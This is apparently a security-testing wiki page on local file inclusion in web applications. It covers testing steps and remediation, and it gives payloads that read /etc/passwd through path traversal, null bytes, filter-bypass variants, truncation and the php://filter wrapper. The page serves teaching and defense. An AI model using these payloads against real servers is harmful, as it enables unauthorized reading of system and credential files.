File Inclusion

File Inclusion happens when an application that accepts an input from a user is not validated which then leads an attacker to include a path to the file to view/run it’s contents.

Impact

Reading contents of a file
Code execution on the web server
Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS)
Denial of Service (DoS)
Sensitive Information Disclosure

Local File Inclusion

LFI is the process of including files that are already present in the target server. LFI occurs when paths passed to include statements are not properly sanitized.

An example of this is when an application receives an input where a path to the file is included and the input is not properly sanitized, the attacker can inject malicious characters to the input such as ../ (dot-dot-slash attack).

Methodology

Review the application first and check how it works.
Look for any file names that are being passed as part of a query string.
- pages/page1.php?filename=welcome.txt
- pages/page1.php?filename=welcome.txt
Verify the OS type of the target host.
Look for error messages from server responses that can help with the investigation.
Observe application behavior
- sometimes If there’s an error, no response is returned.
- sometimes if there’s no error, a response is returned.
sometimes If there’s an error, no response is returned.
sometimes if there’s no error, a response is returned.
Look for LFI payloads that you can run

Testing for LFI

Find an entry point that could be via GET, POST, COOKIE, or HTTP header values!
Enter a valid input to see how the web server behaves.
Enter invalid inputs, including special characters and common file names.
Don't always trust what you supply in input forms is what you intended! Use either a browser address bar or a tool such as Burp suite.
Look for errors while entering invalid input to disclose the current path of the web application; if there are no errors, then trial and error might be your best option.
Understand the input validation and if there are any filters!
Try to inject a valid entry to read sensitive files

Basic Example

Dot-dot-slash attack ../ or Path traversal

http://vulnerable_host/preview.php?file=example.html

http://vulnerable_host/preview.php?file=../../../../etc/passwd

Null Byte Injection

The null character %00 (also known as null terminator or null byte) is a control character with the value zero present in many character sets that is being used as a reserved character to mark the end of a string.

Once used, any character after this special byte will be ignored.

http://vulnerable_host/preview.php?file=../../../../etc/passwd%00

Bypass Recursive Filters

Sometimes applications have deny lists to exclude certain keywords or characters. One way to bypass this is to URL encode the characters (Ctrl+U in Burp Suite) but this will only work on older/misconfigured systems .

Insert some of the characters in the payload between the original characters. When the application checks the payload for any keywords/characters such as ../, it will remove the characters in the middle and the original payload will run.

Example:

From: ..././..././..././..././..././etc/passwd
To: ../../../../../etc/passwd

..././..././..././..././..././etc/passwd
....//....//....//....//....//etc/passwd

Path and Dot Truncation

Most PHP installations have a filename limit of 4096 bytes. If any given filename is longer than that length, PHP simply truncates it, discarding any additional characters.

This bypass would commonly be combined with other logic bypass strategies such as encoding part of the file path with Unicode encoding, the introduction of double encoding, or any other input that would still represent the valid desired filename.

<http://example.com/index.php?page=../../../etc/passwd>............[ADD MORE]
<http://example.com/index.php?page=../../../etc/passwd\\.\\.\\.\\.\\.\\.[ADD> MORE]
<http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD> MORE] 
<http://example.com/index.php?page=../../../>[ADD MORE]../../../../etc/passwd

PHP Wrappers

A wrapper is a code that surrounds other code to perform some added functionality. PHP implements many built-in wrappers to be used with file system functions.

PHP Filter

Used to access the local file system; this is a case insensitive wrapper that provides the capability to apply filters to a stream at the time of opening a file. This wrapper can be used to get content of a file preventing the server from executing it.

The wrapper can be used like php://filter/convert.base64-encode/resource=FILE where FILE is the file to retrieve. As a result of the usage of this execution, the content of the target file would be read, encoded to base64 (this is the step that prevents the execution server-side), and returned to the User-Agent.

Remediation

The most effective solution to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem/framework API. If this is not possible the application can maintain an allow list of files, that may be included by the page, and then use an identifier (for example the index number) to access to the selected file.

Any request containing an invalid identifier has to be rejected, in this way there is no attack surface for malicious users to manipulate the path.

References / Resources

Local File Inclusion: https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion
Remote File Inlcusion: https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion
File Inclusion Payloads: PayloadsAllTheThings/File Inclusion/README.md at master · swisskyrepo/PayloadsAllTheThings · GitHub
File Inclusion Wrappers: PayloadsAllTheThings/File Inclusion/Wrappers.md at master · swisskyrepo/PayloadsAllTheThings · GitHub
PHP Wrappers: PHP: Supported Protocols and Wrappers - Manual

PreviousInsecure Direct Object References (IDOR)NextDirectory Traversal

Last updated 6 months ago